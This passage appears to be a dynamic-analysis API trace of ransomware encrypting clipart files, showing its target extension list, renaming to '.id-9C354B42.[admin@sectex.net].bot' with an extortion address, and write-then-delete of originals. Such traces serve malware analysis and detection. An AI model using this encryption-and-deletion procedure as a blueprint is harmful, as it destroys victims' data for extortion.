	[0164.623] lstrlenW (lpString=".7z") returned 3
	[0164.623] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".dbf") returned 4
	[0164.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".1cd") returned 4
	[0164.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".jpg") returned 4
	[0164.624] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.624] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.624] lstrlenW (lpString="J0152558.WMF") returned 12
	[0164.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.624] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=16052) returned 1
	[0164.624] CloseHandle (hObject=0x3d0) returned 1
	[0164.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf")) returned 0x20
	[0164.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.625] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.625] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.626] GetLastError () returned 0x0
	[0164.626] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3eb4, lpOverlapped=0x0) returned 1
	[0164.646] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3ec0, lpOverlapped=0x0) returned 1
	[0164.647] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.647] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.647] SetEndOfFile (hFile=0x3a4) returned 1
	[0164.647] CloseHandle (hObject=0x3a4) returned 1
	[0164.647] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.647] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.649] CloseHandle (hObject=0x3d0) returned 1
	[0164.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf")) returned 1
	[0164.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.652] lstrlenW (lpString=".doc") returned 4
	[0164.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString=".docx") returned 5
	[0164.652] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0164.652] lstrlenW (lpString=".pdf") returned 4
	[0164.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString=".xls") returned 4
	[0164.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.652] lstrlenW (lpString=".xlsx") returned 5
	[0164.652] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0164.652] lstrlenW (lpString=".ppt") returned 4
	[0164.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.652] lstrlenW (lpString=".zip") returned 4
	[0164.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.652] lstrlenW (lpString=".rar") returned 4
	[0164.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString=".bz2") returned 4
	[0164.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString=".7z") returned 3
	[0164.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.652] lstrlenW (lpString=".dbf") returned 4
	[0164.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.652] lstrlenW (lpString=".1cd") returned 4
	[0164.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString=".jpg") returned 4
	[0164.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString=".doc") returned 4
	[0164.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString=".docx") returned 5
	[0164.653] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0164.653] lstrlenW (lpString=".pdf") returned 4
	[0164.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString=".xls") returned 4
	[0164.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.653] lstrlenW (lpString=".xlsx") returned 5
	[0164.653] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0164.653] lstrlenW (lpString=".ppt") returned 4
	[0164.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString=".zip") returned 4
	[0164.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.653] lstrlenW (lpString=".rar") returned 4
	[0164.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString=".bz2") returned 4
	[0164.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString=".7z") returned 3
	[0164.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString=".dbf") returned 4
	[0164.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.653] lstrlenW (lpString=".1cd") returned 4
	[0164.654] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 63
	[0164.654] lstrlenW (lpString=".jpg") returned 4
	[0164.654] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.654] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.654] lstrlenW (lpString="J0152570.WMF") returned 12
	[0164.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.666] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3368) returned 1
	[0164.666] CloseHandle (hObject=0x3a4) returned 1
	[0164.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf")) returned 0x20
	[0164.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.667] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.667] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0165.888] GetLastError () returned 0x0
	[0165.888] ReadFile (in: hFile=0x3a4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xd28, lpOverlapped=0x0) returned 1
	[0165.893] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xd30, lpOverlapped=0x0) returned 1
	[0165.894] ReadFile (in: hFile=0x3a4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0165.894] WriteFile (in: hFile=0x3a8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0165.894] SetEndOfFile (hFile=0x3a8) returned 1
	[0165.894] CloseHandle (hObject=0x3a8) returned 1
	[0165.895] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.895] SetEndOfFile (hFile=0x3a4) returned 1
	[0165.897] CloseHandle (hObject=0x3a4) returned 1
	[0165.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.915] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf")) returned 1
	[0165.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".doc") returned 4
	[0165.919] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString=".docx") returned 5
	[0165.919] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0165.919] lstrlenW (lpString=".pdf") returned 4
	[0165.919] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString=".xls") returned 4
	[0165.919] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.919] lstrlenW (lpString=".xlsx") returned 5
	[0165.919] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0165.919] lstrlenW (lpString=".ppt") returned 4
	[0165.919] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".zip") returned 4
	[0165.919] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.919] lstrlenW (lpString=".rar") returned 4
	[0165.919] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString=".bz2") returned 4
	[0165.919] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString=".7z") returned 3
	[0165.919] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".dbf") returned 4
	[0165.919] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".1cd") returned 4
	[0165.919] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".jpg") returned 4
	[0165.919] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.919] lstrlenW (lpString=".doc") returned 4
	[0165.920] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString=".docx") returned 5
	[0165.920] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0165.920] lstrlenW (lpString=".pdf") returned 4
	[0165.920] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString=".xls") returned 4
	[0165.920] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.920] lstrlenW (lpString=".xlsx") returned 5
	[0165.920] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0165.920] lstrlenW (lpString=".ppt") returned 4
	[0165.920] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.920] lstrlenW (lpString=".zip") returned 4
	[0165.920] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.920] lstrlenW (lpString=".rar") returned 4
	[0165.920] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString=".bz2") returned 4
	[0165.920] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString=".7z") returned 3
	[0165.920] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.920] lstrlenW (lpString=".dbf") returned 4
	[0165.920] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.920] lstrlenW (lpString=".1cd") returned 4
	[0165.920] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 63
	[0165.920] lstrlenW (lpString=".jpg") returned 4
	[0165.920] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.920] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0165.921] lstrlenW (lpString="J0152600.WMF") returned 12
	[0165.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0165.921] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9768) returned 1
	[0165.921] CloseHandle (hObject=0x1b4) returned 1
	[0165.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf")) returned 0x20
	[0165.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0165.922] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.922] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0168.581] GetLastError () returned 0x0
	[0168.581] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2628, lpOverlapped=0x0) returned 1
	[0168.620] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2630, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2630, lpOverlapped=0x0) returned 1
	[0168.621] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.621] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.621] SetEndOfFile (hFile=0x3c4) returned 1
	[0168.621] CloseHandle (hObject=0x3c4) returned 1
	[0168.621] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.621] SetEndOfFile (hFile=0x1b4) returned 1
	[0168.623] CloseHandle (hObject=0x1b4) returned 1
	[0168.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf")) returned 1
	[0168.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.651] lstrlenW (lpString=".doc") returned 4
	[0168.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.651] lstrlenW (lpString=".docx") returned 5
	[0168.651] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.652] lstrlenW (lpString=".pdf") returned 4
	[0168.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString=".xls") returned 4
	[0168.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.652] lstrlenW (lpString=".xlsx") returned 5
	[0168.652] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.652] lstrlenW (lpString=".ppt") returned 4
	[0168.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString=".zip") returned 4
	[0168.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.652] lstrlenW (lpString=".rar") returned 4
	[0168.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString=".bz2") returned 4
	[0168.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString=".7z") returned 3
	[0168.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString=".dbf") returned 4
	[0168.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString=".1cd") returned 4
	[0168.652] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString=".jpg") returned 4
	[0168.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.652] lstrlenW (lpString=".doc") returned 4
	[0168.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.652] lstrlenW (lpString=".docx") returned 5
	[0168.652] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.652] lstrlenW (lpString=".pdf") returned 4
	[0168.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.653] lstrlenW (lpString=".xls") returned 4
	[0168.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.653] lstrlenW (lpString=".xlsx") returned 5
	[0168.653] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.653] lstrlenW (lpString=".ppt") returned 4
	[0168.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.653] lstrlenW (lpString=".zip") returned 4
	[0168.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.653] lstrlenW (lpString=".rar") returned 4
	[0168.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.653] lstrlenW (lpString=".bz2") returned 4
	[0168.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.653] lstrlenW (lpString=".7z") returned 3
	[0168.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.653] lstrlenW (lpString=".dbf") returned 4
	[0168.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
